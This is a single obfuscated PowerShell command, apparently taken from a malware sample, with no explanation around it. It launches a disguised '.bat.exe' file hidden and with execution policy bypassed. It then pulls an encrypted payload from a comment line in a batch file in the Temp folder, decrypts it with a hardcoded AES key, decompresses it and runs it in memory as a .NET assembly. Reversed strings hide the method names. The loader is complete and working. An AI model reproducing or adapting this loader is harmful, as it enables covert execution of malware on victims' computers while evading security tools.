"Cardlock_341121.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $XTQAJ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Cardlock_341121.bat').Split([Environment]::NewLine);foreach ($IZwgy in $XTQAJ) { if ($IZwgy.StartsWith(':: ')) { $GtysS = $IZwgy.Substring(3); break; }; };$wITtD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($GtysS);$koyaJ = New-Object System.Security.Cryptography.AesManaged;$koyaJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$koyaJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$koyaJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SychF8I561GWEMlxtN8++CMaf76H871o2t4LtIfb91s=');$koyaJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h5tRjioHQN+zscLiG3ARFg==');$OKnOI = $koyaJ.CreateDecryptor();$wITtD = $OKnOI.TransformFinalBlock($wITtD, 0, $wITtD.Length);$OKnOI.Dispose();$koyaJ.Dispose();$QzGPh = New-Object System.IO.MemoryStream(, $wITtD);$SSeOQ = New-Object System.IO.MemoryStream;$yDqgG = New-Object System.IO.Compression.GZipStream($QzGPh, [IO.Compression.CompressionMode]::Decompress);$yDqgG.CopyTo($SSeOQ);$yDqgG.Dispose();$QzGPh.Dispose();$SSeOQ.Dispose();$wITtD = $SSeOQ.ToArray();$leFDo = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($wITtD);$GNwko = $leFDo.EntryPoint;$GNwko.Invoke($null, (, [string[]] ('')))